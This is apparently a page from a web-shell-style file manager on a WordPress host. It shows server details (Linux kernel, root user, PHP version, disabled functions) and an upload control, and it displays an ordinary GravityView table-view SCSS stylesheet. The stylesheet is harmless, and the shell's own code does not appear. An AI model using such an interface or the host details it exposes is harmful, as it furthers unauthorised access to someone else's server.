HEX
Server:
System: Linux aac286ea486c 5.14.0-687.15.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jun 11 08:51:45 EDT 2026 x86_64
User: root (0)
PHP: 8.2.30
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,disk_free_space,diskfreespace
Upload Files
File: /dom877180/wp-content/plugins/gravityview/templates/css/source/table-view.scss
// ================================================
// Responsive Table View Template Styles for GravityView
// https://www.gravitykit.com
// ================================================

@import "table-view-legacy";

/**
 * @see https://j.eremy.net/responsive-table/
 *
 * Note: max-width based on Bootstrap: https://getbootstrap.com/docs/4.1/layout/overview/#responsive-breakpoints
 */
@media screen and ( max-width: 575.98px ) {
	.gv-table-view {
		thead,
		tfoot {
			display: none;
		}

		tr {
			display: block;
			position: relative;
			padding: 1.2em 0;
			overflow-x: auto;

			&:first-of-type {
				border-top: 1px solid #ccc;
			}

			td {
				display: table-row;

				&:before {
					content: attr( data-label );
					font-weight: bold;
					display: table-cell;
					padding: 0.2em 0.6em 0.2em 0;
					text-align: right;
					width: 40%;
				}

				&:last-child:after {
					content: '';
					position: absolute;
					left: 0;
					right: 0;
					bottom: 0;
					border-bottom: 1px solid #ccc;
					width: 100%;
				}
			}
		}
	}
}